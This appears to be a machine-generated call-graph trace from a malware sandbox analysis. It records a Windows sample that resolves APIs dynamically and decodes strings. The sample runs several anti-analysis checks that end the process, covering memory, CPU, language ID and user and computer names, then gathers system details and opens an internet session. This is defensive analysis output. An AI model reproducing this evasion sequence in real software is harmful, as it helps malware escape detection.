58278->58279 58280 184610 2 API calls 58279->58280 58281 182589 58280->58281 58282 184610 2 API calls 58281->58282 58283 1825a2 58282->58283 58284 184610 2 API calls 58283->58284 58285 1825bb 58284->58285 58286 184610 2 API calls 58285->58286 58287 1825d4 58286->58287 58288 184610 2 API calls 58287->58288 58289 1825ed 58288->58289 58290 184610 2 API calls 58289->58290 58291 182606 58290->58291 58292 184610 2 API calls 58291->58292 58293 18261f 58292->58293 58294 184610 2 API calls 58293->58294 58295 182638 58294->58295 58296 184610 2 API calls 58295->58296 58297 182651 58296->58297 58298 184610 2 API calls 58297->58298 58299 18266a 58298->58299 58300 184610 2 API calls 58299->58300 58301 182683 58300->58301 58302 184610 2 API calls 58301->58302 58303 18269c 58302->58303 58304 184610 2 API calls 58303->58304 58305 1826b5 58304->58305 58306 184610 2 API calls 58305->58306 58307 1826ce 58306->58307 58308 199270 58307->58308 58580 199160 GetPEB 58308->58580 58310 199278 58311 19928a 58310->58311 58312 1994a3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 58310->58312 58317 19929c 21 API calls 58311->58317 58313 19951d 58312->58313 58314 199504 GetProcAddress 58312->58314 58315 199556 58313->58315 58316 199526 GetProcAddress GetProcAddress 58313->58316 58314->58313 58318 199578 58315->58318 58319 19955f GetProcAddress 58315->58319 58316->58315 58317->58312 58320 199599 58318->58320 58321 199581 GetProcAddress 58318->58321 58319->58318 58322 1964a0 58320->58322 58323 1995a2 GetProcAddress GetProcAddress 58320->58323 58321->58320 58324 19a110 58322->58324 58323->58322 58325 19a120 58324->58325 58326 1964ad 58325->58326 58327 19a14e lstrcpy 58325->58327 58328 1811d0 58326->58328 58327->58326 58329 1811e8 58328->58329 58330 18120f ExitProcess 58329->58330 58331 181217 58329->58331 58332 181160 GetSystemInfo 58331->58332 58333 18117c ExitProcess 58332->58333 58334 181184 58332->58334 58335 181110 GetCurrentProcess VirtualAllocExNuma 58334->58335 58336 181149 58335->58336 58337 181141 ExitProcess 58335->58337 58581 1810a0 VirtualAlloc 58336->58581 58340 181220 58585 198450 58340->58585 58343 181249 58344 18129a 58343->58344 58345 181292 ExitProcess 58343->58345 58346 196210 GetUserDefaultLangID 58344->58346 58347 196273 58346->58347 58348 196232 58346->58348 58354 181190 58347->58354 58348->58347 58349 19626b ExitProcess 58348->58349 58350 19624d ExitProcess 58348->58350 58351 196261 ExitProcess 58348->58351 58352 196243 ExitProcess 58348->58352 58353 196257 ExitProcess 58348->58353 58355 197380 3 API calls 58354->58355 58356 18119e 58355->58356 58357 1811cc 58356->58357 58358 1972f0 3 API calls 58356->58358 58361 1972f0 GetProcessHeap RtlAllocateHeap GetUserNameA 58357->58361 58359 1811b7 58358->58359 58359->58357 58360 1811c4 ExitProcess 58359->58360 58362 1964d0 58361->58362 58363 197380 GetProcessHeap RtlAllocateHeap GetComputerNameA 58362->58363 58364 1964e3 58363->58364 58365 19a380 58364->58365 58587 19a0e0 58365->58587 58367 19a391 lstrlen 58369 19a3b0 58367->58369 58368 19a3e8 58588 19a170 58368->58588 58369->58368 58371 19a3ca lstrcpy lstrcat 58369->58371 58371->58368 58372 19a3f4 58372->58200 58374 19a28b 58373->58374 58375 19a2db 58374->58375 58376 19a2c9 lstrcpy 58374->58376 58375->58212 58376->58375 58592 1962c0 58377->58592 58379 19642e 58380 196438 sscanf 58379->58380 58621 19a1d0 58380->58621 58382 19644a SystemTimeToFileTime SystemTimeToFileTime 58383 19646e 58382->58383 58384 196480 58382->58384 58383->58384 58385 196478 ExitProcess 58383->58385 58386 1955f0 58384->58386 58387 1955fd 58386->58387 58388 19a110 lstrcpy 58387->58388 58389 19560e 58388->58389 58623 19a1f0 lstrlen 58389->58623 58392 19a1f0 2 API calls 58393 195644 58392->58393 58394 19a1f0 2 API calls 58393->58394 58395 195654 58394->58395 58627 195f10 58395->58627 58398 19a1f0 2 API calls 58399 195673 58398->58399 58400 19a1f0 2 API calls 58399->58400 58401 195680 58400->58401 58402 19a1f0 2 API calls 58401->58402 58403 19568d 58402->58403 58404 19a1f0 2 API calls 58403->58404 58405 1956d9 58404->58405 58636 1826f0 58405->58636 58413 1957a3 58414 195f10 lstrcpy 58413->58414 58415 1957b5 58414->58415 58416 19a170 lstrcpy 58415->58416 58417 1957d2 58416->58417 58418 19a380 4 API calls 58417->58418 58419 1957ea 58418->58419 58420 19a270 lstrcpy 58419->58420 58421 1957f6 58420->58421 58422 19a380 4 API calls 58421->58422 58423 19581a 58422->58423 58424 19a270 lstrcpy 58423->58424 58425 195826 58424->58425 58426 19a380 4 API calls 58425->58426 58427 19584a 58426->58427 58428 19a270 lstrcpy 58427->58428 58429 195856 58428->58429 58430 19a110 lstrcpy 58429->58430 58431 19587e 58430->58431 59362 196fa0 GetWindowsDirectoryA 58431->59362 58434 19a170 lstrcpy 58435 195898 58434->58435 59372 1848d0 58435->59372 58437 19589e 59517 1912b0 58437->59517 58439 1958a6 58440 19a110 lstrcpy 58439->58440 58441 1958c9 58440->58441 58442 181590 lstrcpy 58441->58442 58443 1958dd 58442->58443 59533 1859b0 58443->59533 58445 1958e3 59677 190b60 58445->59677 58447 1958ee 58448 19a110 lstrcpy 58447->58448 58449 195912 58448->58449 58450 181590 lstrcpy 58449->58450 58451 195926 58450->58451 58452 1859b0 37 API calls 58451->58452 58453 19592c 58452->58453 59681 1908a0 58453->59681 58455 195937 58456 19a110 lstrcpy 58455->58456 58457 195959 58456->58457 58458 181590 lstrcpy 58457->58458 58459 19596d 58458->58459 58460 1859b0 37 API calls 58459->58460 58461 195973 58460->58461 59688 190a50 58461->59688 58463 19597e 58464 181590 lstrcpy 58463->58464 58465 195995 58464->58465 59693 191520 58465->59693 58467 19599a 58468 19a110 lstrcpy 58467->58468 58469 1959b6 58468->58469 60037 185000 GetProcessHeap RtlAllocateHeap InternetOpenA 58469->60037 58471 1959bb 58472 181590 lstrcpy 58471->58472 58473 195a3b 58472->58473 60044 190580 58473->60044 58576 184621 RtlAllocateHeap 58575->58576 58579 184671 VirtualProtect 58576->58579 58579->58223 58580->58310 58583 1810c2 ctype 58581->58583 58582 1810fd 58582->58340 58583->58582 58584 1810e2 VirtualFree 58583->58584 58584->58582 58586 181233 GlobalMemoryStatusEx 58585->58586 58586->58343 58587->58367 58589 19a192 58588->58589 58590 19a1bc 58589->58590 58591 19a1aa lstrcpy 58589->58591 58590->58372 58591->58590 58593 19a110 lstrcpy 58592->58593 58594 1962d3 58593->58594 58595 19a380 4 API calls 58594->58595 58596 1962e5 58595->58596 58597 19a270 lstrcpy 58596->58597 58598 1962ee 58597->58598 58599 19a380 4 API calls 58598->58599 58600 196307 58599->58600 58601 19a270 lstrcpy 58600->58601 58602 196310 58601->58602 58603 19a380 4 API calls 58602->58603 58604 19632a 58603->58604 58605 19a270 lstrcpy 58604->58605 58606 196333 58605->58606 58607 19a380 4 API calls 58606->58607 58608 19634c 58607->58608 58609 19a270 lstrcpy 58608->58609 58610 196355 58609->58610 58611 19a380 4 API calls 58610->58611 58612 19636f 58611->58612 58613 19a270 lstrcpy 58612->58613 58614 196378 58613->58614 58615 19a380 4 API calls 58614->58615 58616 196393 58615->58616 58617 19a270 lstrcpy 58616->58617 58618 19639c 58617->58618 58619 19a170 lstrcpy 58618->58619 58620 1963b0 58619->58620 58620->58379 58622 19a1e2 58621->58622 58622->58382 58624 19a20f 58623->58624 58625 195634 58624->58625 58626 19a24b lstrcpy 58624->58626 58625->58392 58626->58625 58628 19a270 lstrcpy 58627->58628 58629 195f23 58628->58629 58630 19a270 lstrcpy 58629->58630 58631 195f35 58630->58631 58632 19a270 lstrcpy 58631->58632 58633 195f47 58632->58633 58634 19a270 lstrcpy 58633->58634 58635 195666 58634->58635 58635->58398 58637 184610 2 API calls 58636->58637 58638 182704 58637->58638 58639 184610 2 API calls 58638->58639 58640 182727 58639->58640 58641 184610 2 API calls 58640->58641 58642 182740 58641->58642 58643 184610 2 API calls 58642->58643 58644 182759 58643->58644 58645 184610 2 API calls 58644->58645 58646 182786 58645->58646 58647 184610 2 API calls 58646->58647 58648 18279f 58647->58648 58649 184610 2 API calls 58648->58649 58650 1827b8 58649->58650 58651 184610 2 API calls 58650->58651 58652 1827e5 58651->58652 58653 184610 2 API calls 58652->58653 58654 1827fe 58653->58654 58655 184610 2 API calls 58654->58655 58656 182817 58655->58656 58657 184610 2 API calls 58656->58657 58658 182830 58657->58658 58659 184610 2 API calls 58658->58659 58660 182849 58659->58660 58661 184610 2 API calls 58660->58661 58662 182862 58661->58662 58663 184610 2 API calls 58662->58663 58664 18287b 58663->58664 58665 184610 2 API calls 58664->58665 58666 182894 58665->58666 58667 184610 2 API calls 58666->58667 58668 1828ad 58667->58668 58669 184610 2 API calls 58668->58669 58670 1828c6 58669->58670 58671 184610 2 API calls 58670->58671 58672 1828df 58671->58672 58673 184610 2 API calls 58672->58673 58674 1828f8 58673->58674 58675 184610 2 API calls 58674->58675 58676 182911 58675->58676 58677 184610 2 API calls 58676->58677 58678 18292a 58677->58678 58679 184610 2 API calls 58678->58679 58680 182943 58679->58680 58681 184610 2 API calls 58680->58681 58682 18295c 58681->58682 58683 184610 2 API calls 58682->58683 58684 182975 58683->58684 58685 184610 2 API calls 58684->58685 58686 18298e 58685->58686 58687 184610 2 API calls 58686->58687 58688 1829a7 58687->58688 58689 184610 2 API calls 58688->58689 58690 1829c0 58689->58690 58691 184610 2 API calls 58690->58691 58692 1829d9 58691->58692 58693 184610 2 API calls 58692->58693 58694 1829f2 58693->58694 58695 184610 2 API calls 58694->58695 58696 182a0b 58695->58696 58697 184610 2 API calls 58696->58697 58698 182a24 58697->58698 58699 184610 2 API calls 58698->58699 58700 182a3d 58699->58700 58701 184610 2 API calls 58700->58701 58702 182a56 58701->58702 58703 184610 2 API calls 58702->58703 58704 182a6f 58703->58704 58705 184610 2 API calls 58704->58705 58706 182a88 58705->58706 58707 184610 2 API calls 58706->58707 58708 182aa1 58707->58708 58709 184610 2 API calls 58708->58709 58710 182aba 58709->58710 58711 184610 2 API calls 58710->58711 58712 182ad3 58711->58712 58713 184610 2 API calls 58712->58713 58714 182aec 58713->58714 58715 184610 2 API calls 58714->58715 58716 182b05 58715->58716 58717 184610 2 API calls 58716->58717 58718 182b1e 58717->58718 58719 184610 2 API calls 58718->58719 58720 182b37 58719->58720 58721 184610 2 API calls 58720->58721 58722 182b50 58721->58722 58723 184610 2 API calls 58722->58723 58724 182b69 58723->58724 58725 184610 2 API calls 58724->58725 58726 182b82 58725->58726 58727 184610 2 API calls 58726->58727 58728 182b9b 58727->58728 58729 184610 2 API calls 58728->58729 58730 182bb4 58729->58730 58731 184610 2 API calls 58730->58731 58732 182bcd 58731->58732 58733 184610 2 API calls 58732->58733 58734 182be6 58733->58734 58735 184610 2 API calls 58734->58735 58736 182bff 58735->58736 58737 184610 2 API calls 58736->58737 58738 182c18 58737->58738 58739 184610 2 API calls 58738->58739 58740 182c31 58739->58740 58741 184610 2 API calls 58740->58741 58742 182c4a 58741->58742 58743 184610 2 API calls 58742->58743 58744 182c63 58743->58744 58745 184610 2 API calls 58744->58745 58746 182c7c 58745->58746 58747 184610 2 API calls 58746->58747 58748 182c95 58747->58748 58749 184610 2 API calls 58748->58749 58750 182cae 58749->58750 58751 184610 2 API calls 58750->58751 58752 182cc7 58751->58752 58753 184610 2 API calls 58752->58753 58754 182ce0 58753->58754 58755 184610 2 API calls 58754->58755 58756 182cf9 58755->58756 58757 184610 2 API calls 58756->58757 58758 182d12 58757->58758 58759 184610 2 API calls 58758->58759 58760 182d2b 58759->58760 58761 184610 2 API calls 58760->58761 58762 182d44 58761->58762 58763 184610 2 API calls 58762->58763 58764 182d5d 58763->58764 58765 184610 2 API calls 58764->58765 58766 182d76 58765->58766 58767 184610 2 API calls 58766->58767 58768 182d8f 58767->58768 58769 184610 2 API calls 58768->58769 58770 182da8 58769->58770 58771 184610 2 API calls 58770->58771 58772 182dc1 58771->58772 58773 184610 2 API calls 58772->58773 58774 182dda 58773->58774 58775 184610 2 API calls 58774->58775 58776 182df3 58775->58776 58777 184610 2 API calls 58776->58777 58778 182e0c 58777->58778 58779 184610 2 API calls 58778->58779 58780 182e25 58779->58780 58781 184610 2 API calls 58780->58781 58782 182e3e 58781->58782 58783 184610 2 API calls 58782->58783 58784 182e57 58783->58784 58785 184610 2 API calls 58784->58785 58786 182e70 58785->58786 58787 184610 2 API calls 58786->58787 58788 182e89 58787->58788 58789 184610 2 API calls 58788->58789 58790 182ea2 58789->58790 58791 184610 2 API calls 58790->58791 58792 182ebb 58791->58792 58793 184610 2 API calls 58792->58793 58794 182ed4 58793->58794 58795 184610 2 API calls 58794->58795 58796 182eed 58795->58796 58797 184610 2 API calls 58796->58797 58798 182f06 58797->58798 58799 184610 2 API calls 58798->58799 58800 182f1f 58799->58800 58801 184610 2 API calls 58800->58801 58802 182f38 58801->58802 58803 184610 2 API calls 58802->58803 58804 182f51 58803->58804 58805 184610 2 API calls 58804->58805 58806 182f6a 58805->58806 58807 184610 2 API calls 58806->58807 58808 182f83 58807->58808 58809 184610 2 API calls 58808->58809 58810 182f9c 58809->58810 58811 184610 2 API calls 58810->58811 58812 182fb5 58811->58812 58813 184610 2 API calls 58812->58813 58814 182fce 58813->58814 58815 184610 2 API calls 58814->58815 58816 182fe7 58815->58816 58817 184610 2 API calls 58816->58817 58818 183000 58817->58818 58819 184610 2 API calls 58818->58819 58820 183019 58819->58820 58821 184610 2 API calls 58820->58821 58822 183032 58821->58822 58823 184610 2 API calls 58822->58823 58824 18304b 58823->58824 58825 184610 2 API calls 58824->58825 58826 183064 58825->58826 58827 184610 2 API calls 58826->58827 58828 18307d 58827->58828 58829 184610 2 API calls 58828->58829 58830 183096 58829->58830 58831 184610 2 API calls 58830->58831 58832 1830af 58831->58832 58833 184610 2 API calls 58832->58833 58834 1830c8 58833->58834 58835 184610 2 API calls 58834->58835 58836 1830e1 58835->58836 58837 184610 2 API calls 58836->58837 58838 1830fa 58837->58838 58839 184610 2 API calls 58838->58839 58840 183113 58839->58840 58841 184610 2 API calls 58840->58841 58842 18312c 58841->58842 58843 184610 2 API calls 58842->58843 58844 183145 58843->58844 58845 184610 2 API calls 58844->58845 58846 18315e 58845->58846 58847 184610 2 API calls 58846->58847 58848 183177 58847->58848 58849 184610 2 API calls 58848->58849 58850 183190 58849->58850 58851 184610 2 API calls 58850->58851 58852 1831a9 58851->58852 58853 184610 2 API calls 58852->58853 58854 1831c2 58853->58854 58855 184610 2 API calls 58854->58855 58856 1831db 58855->58856 58857 184610 2 API calls 58856->58857 58858 1831f4 58857->58858 58859 184610 2 API calls 58858->58859 58860 18320d 58859->58860 58861 184610 2 API calls 58860->58861 58862 183226 58861->58862 58863 184610 2 API calls 58862->58863 58864 18323f 58863->58864 58865 184610 2 API calls 58864->58865 58866 183258 58865->58866 58867 184610 2 API calls 58866->58867 58868 183271 58867->58868 58869 184610 2 API calls 58868->58869 58870 18328a 58869->58870 58871 184610 2 API calls 58870->58871 58872 1832a3 58871->58872 58873 184610 2 API calls 58872->58873 58874 1832bc 58873->58874 58875 184610 2 API calls 58874->58875 58876 1832d5 58875->58876 58877 184610 2 API calls 58876->58877 58878 1832ee 58877->58878 58879 184610 2 API calls 58878->58879 58880 183307 58879->58880 58881 184610 2 API calls 58880->58881 58882 183320 58881->58882 58883 184610 2 API calls 58882->58883 58884 183339 58883->58884 58885 184610 2 API calls 58884->58885 58886 183352 58885->58886 58887 184610 2 API calls 58886->58887 58888 18336b 58887->58888 58889 184610 2 API calls 58888->58889 58890 183384 58889->58890 58891 184610 2 API calls 58890->58891 58892 18339d 58891->58892 58893 184610 2 API calls 58892->58893 58894 1833b6 58893->58894 58895 184610 2 API calls 58894->58895 58896 1833cf 58895->58896 58897 184610 2 API calls 58896->58897 58898 1833e8 58897->58898 58899 184610 2 API calls 58898->58899 58900 183401 58899->58900 58901 184610 2 API calls 58900->58901 58902 18341a 58901->58902 58903 184610 2 API calls 58902->58903 58904 183433 58903->58904 58905 184610 2 API calls 58904->58905 58906 18344c 58905->58906 58907 184610 2 API calls 58906->58907 58908 183465 58907->58908 58909 184610 2 API calls 58908->58909 58910 18347e 58909->58910 58911 184610 2 API calls 58910->58911 58912 183497 58911->58912 58913 184610 2 API calls 58912->58913 58914 1834b0 58913->58914 58915 184610 2 API calls 58914->58915 58916 1834c9 58915->58916 58917 184610 2 API calls 58916->58917 58918 1834e2 58917->58918 58919 184610 2 API calls 58918->58919 58920 1834fb 58919->58920 58921 184610 2 API calls 58920->58921 58922 183514 58921->58922 58923 184610 2 API calls 58922->58923 58924 18352d 58923->58924 58925 184610 2 API calls 58924->58925 58926 183546 58925->58926 58927 184610 2 API calls 58926->58927 58928 18355f 58927->58928 58929 184610 2 API calls 58928->58929 58930 183578 58929->58930 58931 184610 2 API calls 58930->58931 58932 183591 58931->58932 58933 184610 2 API calls 58932->58933 58934 1835aa 58933->58934 58935 184610 2 API calls 58934->58935 58936 1835c3 58935->58936 58937 184610 2 API calls 58936->58937 58938 1835dc 58937->58938 58939 184610 2 API calls 58938->58939 58940 1835f5 58939->58940 58941 184610 2 API calls 58940->58941 58942 18360e 58941->58942 58943 184610 2 API calls 58942->58943 58944 183627 58943->58944 58945 184610 2 API calls 58944->58945 58946 183640 58945->58946 58947 184610 2 API calls 58946->58947 58948 183659 58947->58948 58949 184610 2 API calls 58948->58949 58950 183672 58949->58950 58951 184610 2 API calls 58950->58951 58952 18368b 58951->58952 58953 184610 2 API calls 58952->58953 58954 1836a4 58953->58954 58955 184610 2 API calls 58954->58955 58956 1836bd 58955->58956 58957 184610 2 API calls 58956->58957 58958 1836d6 58957->58958 58959 184610 2 API calls 58958->58959 58960 1836ef 58959->58960 58961 184610 2 API calls 58960->58961 58962 183708 58961->58962 58963 184610 2 API calls 58962->58963 58964 183721 58963->58964 58965 184610 2 API calls 58964->58965 58966 18373a 58965->58966 58967 184610 2 API calls 58966->58967 58968 183753 58967->58968 58969 184610 2 API calls 58968->58969 58970 18376c 58969->58970 58971 184610 2 API calls 58970->58971 58972 183785 58971->58972 58973 184610 2 API calls 58972->58973 58974 18379e 58973->58974 58975 184610 2 API calls 58974->58975 58976 1837b7 58975->58976 58977 184610 2 API calls 58976->58977 58978 1837d0 58977->58978 58979 184610 2 API calls 58978->58979 58980 1837e9 58979->58980 58981 184610 2 API calls 58980->58981 58982 183802 58981->58982 58983 184610 2 API calls 58982->58983 58984 18381b 58983->58984 58985 184610 2 API calls 58984->58985 58986 183834 58985->58986 58987 184610 2 API calls 58986->58987 58988 18384d 58987->58988 58989 184610 2 API calls 58988->58989 58990 183866 58989->58990 58991 184610 2 API calls 58990->58991 58992 18387f 58991->58992 58993 184610 2 API calls 58992->58993 58994 183898 58993->58994 58995 184610 2 API calls 58994->58995 58996 1838b1 58995->58996 58997 184610 2 API calls 58996->58997 58998 1838ca 58997->58998 58999 184610 2 API calls 58998->58999 59000 1838e3 58999->59000 59001 184610 2 API calls 59000->59001 59002 1838fc 59001->59002 59003 184610 2 API calls 59002->59003 59004 183915 59003->59004 59005 184610 2 API calls 59004->59005 59006 18392e 59005->59006 59007 184610 2 API calls 59006->59007 59008 183947 59007->59008 59009 184610 2 API calls 59008->59009 59010 183960 59009->59010 59011 184610 2 API calls 59010->59011 59012 183979 59011->59012 59013 184610 2 API calls 59012->59013 59014 183992 59013->59014 59015 184610 2 API calls 59014->59015 59016 1839ab 59015->59016 59017 184610 2 API calls 59016->59017 59018 1839c4 59017->59018 59019 184610 2 API calls 59018->59019 59020 1839dd 59019->59020 59021 184610 2 API calls 59020->59021 59022 1839f6 59021->59022 59023 184610 2 API calls 59022->59023 59024 183a0f 59023->59024 59025 184610 2 API calls 59024->59025 59026 183a28 59025->59026 59027 184610 2 API calls 59026->59027 59028 183a41 59027->59028 59029 184610 2 API calls 59028->59029 59030 183a5a 59029->59030 59031 184610 2 API calls 59030->59031 59032 183a73 59031->59032 59033 184610 2 API calls 59032->59033 59034 183a8c 59033->59034 59035 184610 2 API calls 59034->59035 59036 183aa5 59035->59036 59037 184610 2 API calls 59036->59037 59038 183abe 59037->59038 59039 184610 2 API calls 59038->59039 59040 183ad7 59039->59040 59041 184610 2 API calls 59040->59041 59042 183af0 59041->59042 59043 184610 2 API calls 59042->59043 59044 183b09 59043->59044 59045 184610 2 API calls 59044->59045 59046 183b22 59045->59046 59047 184610 2 API calls 59046->59047 59048 183b3b 59047->59048 59049 184610 2 API calls 59048->59049 59050 183b54 59049->59050 59051 184610 2 API calls 59050->59051 59052 183b6d 59051->59052 59053 184610 2 API calls 59052->59053 59054 183b86 59053->59054 59055 184610 2 API calls 59054->59055 59056 183b9f 59055->59056 59057 184610 2 API calls 59056->59057 59058 183bb8 59057->59058 59059 184610 2 API calls 59058->59059 59060 183bd1 59059->59060 59061 184610 2 API calls 59060->59061 59062 183bea 59061->59062 59063 184610 2 API calls 59062->59063 59064 183c03 59063->59064 59065 184610 2 API calls 59064->59065 59066 183c1c 59065->59066 59067 184610 2 API calls 59066->59067 59068 183c35 59067->59068 59069 184610 2 API calls 59068->59069 59070 183c4e 59069->59070 59071 184610 2 API calls 59070->59071 59072 183c67 59071->59072 59073 184610 2 API calls 59072->59073 59074 183c80 59073->59074 59075 184610 2 API calls 59074->59075 59076 183c99 59075->59076 59077 184610 2 API calls 59076->59077 59078 183cb2 59077->59078 59079 184610 2 API calls 59078->59079 59080 183ccb 59079->59080 59081 184610 2 API calls 59080->59081 59082 183ce4 59081->59082 59083 184610 2 API calls 59082->59083 59084 183cfd 59083->59084 59085 184610 2 API calls 59084->59085 59086 183d16 59085->59086 59087 184610 2 API calls 59086->59087 59088 183d2f 59087->59088 59089 184610 2 API calls 59088->59089 59090 183d48 59089->59090 59091 184610 2 API calls 59090->59091 59092 183d61 59091->59092 59093 184610 2 API calls 59092->59093 59094 183d7a 59093->59094 59095 184610 2 API calls 59094->59095 59096 183d93 59095->59096 59097 184610 2 API calls 59096->59097 59098 183dac 59097->59098 59099 184610 2 API calls 59098->59099 59100 183dc5 59099->59100 59101 184610 2 API calls 59100->59101 59102 183dde 59101->59102 59103 184610 2 API calls 59102->59103 59104 183df7 59103->59104 59105 184610 2 API calls 59104->59105 59106 183e10 59105->59106 59107 184610 2 API calls 59106->59107 59108 183e29 59107->59108 59109 184610 2 API calls 59108->59109 59110 183e42 59109->59110 59111 184610 2 API calls 59110->59111 59112 183e5b 59111->59112 59113 184610 2 API calls 59112->59113 59114 183e74 59113->59114 59115 184610 2 API calls 59114->59115 59116 183e8d 59115->59116 59117 184610 2 API calls 59116->59117 59118 183ea6 59117->59118 59119 184610 2 API calls 59118->59119 59120 183ebf 59119->59120 59121 184610 2 API calls 59120->59121 59122 183ed8 59121->59122 59123 184610 2 API calls 59122->59123 59124 183ef1 59123->59124 59125 184610 2 API calls 59124->59125 59126 183f0a 59125->59126 59127 184610 2 API calls 59126->59127 59128 183f23 59127->59128 59129 184610 2 API calls 59128->59129 59130 183f3c 59129->59130 59131 184610 2 API calls 59130->59131 59132 183f55 59131->59132 59133 184610 2 API calls 59132->59133 59134 183f6e 59133->59134 59135 184610 2 API calls 59134->59135 59136 183f87 59135->59136 59137 184610 2 API calls 59136->59137 59138 183fa0 59137->59138 59139 184610 2 API calls 59138->59139 59140 183fb9 59139->59140 59141 184610 2 API calls 59140->59141 59142 183fd2 59141->59142 59143 184610 2 API calls 59142->59143 59144 183feb 59143->59144 59145 184610 2 API calls 59144->59145 59146 184004 59145->59146 59147 184610 2 API calls 59146->59147 59148 18401d 59147->59148 59149 184610 2 API calls 59148->59149 59150 184036 59149->59150 59151 184610 2 API calls 59150->59151 59152 18404f 59151->59152 59153 184610 2 API calls 59152->59153 59154 184068 59153->59154 59155 184610 2 API calls 59154->59155 59156 184081 59155->59156 59157 184610 2 API calls 59156->59157 59158 18409a 59157->59158 59159 184610 2 API calls 59158->59159 59160 1840b3 59159->59160 59161 184610 2 API calls 59160->59161 59162 1840cc 59161->59162 59163 184610 2 API calls 59162->59163 59164 1840e5 59163->59164 59165 184610 2 API calls 59164->59165 59166 1840fe 59165->59166 59167 184610 2 API calls 59166->59167 59168 184117 59167->59168 59169 184610 2 API calls 59168->59169 59170 184130 59169->59170 59171 184610 2 API calls 59170->59171 59172 184149 59171->59172 59173 184610 2 API calls 59172->59173 59174 184162 59173->59174 59175 184610 2 API calls 59174->59175 59176 18417b 59175->59176 59177 184610 2 API calls 59176->59177 59178 184194 59177->59178 59179 184610 2 API calls 59178->59179 59180 1841ad 59179->59180 59181 184610 2 API calls 59180->59181 59182 1841c6 59181->59182 59183 184610 2 API calls 59182->59183 59184 1841df 59183->59184 59185 184610 2 API calls 59184->59185 59186 1841f8 59185->59186 59187 184610 2 API calls 59186->59187 59188 184211 59187->59188 59189 184610 2 API calls 59188->59189 59190 18422a 59189->59190 59191 184610 2 API calls 59190->59191 59192 184243 59191->59192 59193 184610 2 API calls 59192->59193 59194 18425c 59193->59194 59195 184610 2 API calls 59194->59195 59196 184275 59195->59196 59197 184610 2 API calls 59196->59197 59198 18428e 59197->59198 59199 184610 2 API calls 59198->59199 59200 1842a7 59199->59200 59201 184610 2 API calls 59200->59201 59202 1842c0 59201->59202 59203 184610 2 API calls 59202->59203 59204 1842d9 59203->59204 59205 184610 2 API calls 59204->59205 59206 1842f2 59205->59206 59207 184610 2 API calls 59206->59207 59208 18430b 59207->59208 59209 184610 2 API calls 59208->59209 59210 184324 59209->59210 59211 184610 2 API calls 59210->59211 59212 18433d 59211->59212 59213 184610 2 API calls 59212->59213 59214 184356 59213->59214 59215 184610 2 API calls 59214->59215 59216 18436f 59215->59216 59217 184610 2 API calls 59216->59217 59218 184388 59217->59218 59219 184610 2 API calls 59218->59219 59220 1843a1 59219->59220 59221 184610 2 API calls 59220->59221 59222 1843ba 59221->59222 59223 184610 2 API calls 59222->59223 59224 1843d3 59223->59224 59225 184610 2 API calls 59224->59225 59226 1843ec 59225->59226 59227 184610 2 API calls 59226->59227 59228 184405 59227->59228 59229 184610 2 API calls 59228->59229 59230 18441e 59229->59230 59231 184610 2 API calls 59230->59231 59232 184437 59231->59232 59233 184610 2 API calls 59232->59233 59234 184450 59233->59234 59235 184610 2 API calls 59234->59235 59236 184469 59235->59236 59237 184610 2 API calls 59236->59237 59238 184482 59237->59238 59239 184610 2 API calls 59238->59239 59240 18449b 59239->59240 59241 184610 2 API calls 59240->59241 59242 1844b4 59241->59242 59243 184610 2 API calls 59242->59243 59244 1844cd 59243->59244 59245 184610 2 API calls 59244->59245 59246 1844e6 59245->59246 59247 184610 2 API calls 59246->59247 59248 1844ff 59247->59248 59249 184610 2 API calls 59248->59249 59250 184518 59249->59250 59251 184610 2 API calls 59250->59251 59252 184531 59251->59252 59253 184610 2 API calls 59252->59253 59254 18454a 59253->59254 59255 184610 2 API calls 59254->59255 59256 184563 59255->59256 59257 184610 2 API calls 59256->59257 59258 18457c 59257->59258 59259 184610 2 API calls 59258->59259 59260 184595 59259->59260 59261 184610 2 API calls 59260->59261 59262 1845ae 59261->59262 59263 184610 2 API calls 59262->59263 59264 1845c7 59263->59264 59265 184610 2 API calls 59264->59265 59266 1845e0 59265->59266 59267 184610 2 API calls 59266->59267 59268 1845f9 59267->59268 59269 1995e0 59268->59269 59270 1995f0 43 API calls 59269->59270 59271 199a06 8 API calls 59269->59271 59270->59271 59272 199a9c GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59271->59272 59273 199b16 59271->59273 59272->59273 59274 199b23 8 API calls 59273->59274 59275 199be6 59273->59275 59274->59275 59276 199c68 59275->59276 59277 199bef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59275->59277 59278 199c75 6 API calls 59276->59278 59279 199d07 59276->59279 59277->59276 59278->59279 59280 199def 59279->59280 59281 199d14 9 API calls 59279->59281 59282 199df8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59280->59282 59283 199e72 59280->59283 59281->59280 59282->59283 59284 199e7b GetProcAddress GetProcAddress 59283->59284 59285 199eac 59283->59285 59284->59285 59286 199ee5 59285->59286 59287 199eb5 GetProcAddress GetProcAddress 59285->59287 59288 199fe2 59286->59288 59289 199ef2 10 API calls 59286->59289 59287->59286 59290 199feb GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59288->59290 59291 19a04d 59288->59291 59289->59288 59290->59291 59292 19a06e 59291->59292 59293 19a056 GetProcAddress 59291->59293 59294 195783 59292->59294 59295 19a077 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59292->59295 59293->59292 59296 181590 59294->59296 59295->59294 60329 1816b0 59296->60329 59299 19a170 lstrcpy 59300 1815b5 59299->59300 59301 19a170 lstrcpy 59300->59301 59302 1815c7 59301->59302 59303 19a170 lstrcpy 59302->59303 59304 1815d9 59303->59304 59305 19a170 lstrcpy 59304->59305 59306 181663 59305->59306 59307 194ff0 59306->59307 59308 195001 59307->59308 59309 19a1f0 2 API calls 59308->59309 59310 19500e 59309->59310 59311 19a1f0 2 API calls 59310->59311 59312 19501b 59311->59312 59313 19a1f0 2 API calls 59312->59313 59314 195028 59313->59314 59315 19a110 lstrcpy 59314->59315 59316 195035 59315->59316 59317 19a110 lstrcpy 59316->59317 59318 195042 59317->59318 59319 19a110 lstrcpy 59318->59319 59320 19504f 59319->59320 59321 19a110 lstrcpy 59320->59321 59353 19505c 59321->59353 59322 19a1f0 lstrlen lstrcpy 59322->59353 59323 19a110 lstrcpy 59323->59353 59324 19a170 lstrcpy 59324->59353 59325 19a270 lstrcpy 59325->59353 59326 195123 StrCmpCA 59326->59353 59327 195180 StrCmpCA 59328 1952bc 59327->59328 59327->59353 59329 19a270 lstrcpy 59328->59329 